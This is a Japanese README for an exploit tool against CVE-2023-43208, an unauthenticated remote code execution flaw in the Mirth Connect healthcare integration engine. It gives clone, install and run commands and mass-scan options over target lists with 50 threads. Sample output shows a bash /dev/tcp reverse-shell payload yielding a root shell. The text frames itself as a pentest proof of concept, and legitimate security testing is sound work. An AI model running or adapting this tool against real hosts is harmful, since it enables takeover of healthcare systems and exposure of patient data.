
Mirth ConnectのCVE-2023-43208におけるXMLデシリアライゼーションを介した認証なしRCEエクスプロイト。バージョン検出、バルクスキャン、対話型PTYシェルを備えています。
CVE-2023-43208 のProof-of-Conceptエクスプロイトです。これは、Mirth Connect のバージョン
4.4.1未満における、認証不要のリモートコード実行(RCE)脆弱性です。
Mirth Connectは広く使われているオープンソースのヘルスケア統合エンジンです。この脆弱性は、Apache Commons Collectionsのガジェットをチェーン化した細工されたXMLペイロードを使用して、/api/users エンドポイントを介したJavaデシリアライゼーションの欠陥を悪用し、認証なしでRCEを達成します。
強化版では、オリジナルの pwncat リスナーを、Pythonの組み込みモジュール(socket、select、tty、termios)のみを使用した完全な依存関係不要の対話型PTYシェルに置き換えています。接続時にシェルは自動的にフルPTYにアップグレードされます。
| ソフトウェア | 脆弱なバージョン | 修正バージョン |
|---|---|---|
| Mirth Connect | < 4.4.1 | 4.4.1+ |
python3/python/script フォールバック)stty rows/cols)pwncat 依存なし — リスナーは標準ライブラリのみgit clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt
requests
packaging
rich
alive-progress
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt
| フラグ | 説明 |
|---|---|
-u, --url | ターゲットURL |
-lh, --lhost | 自身のリスニングIP |
-lp, --lport | 自身のリスニングポート |
-bp, --bindport | バインドポートの上書き(ngrok使用時に便利) |
-f, --file | ターゲットURLのリストを含むファイル |
-o, --output | 脆弱なターゲットをファイルに保存 |
-t, --threads | スキャン時のスレッド数(デフォルト: 50) |
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...
root@mirth:/#
このツールは許可されたペネトレーションテストおよび教育目的のみを意図しています。
あなたが所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。
著者は、このツールの誤用や損害について一切の責任を負いません。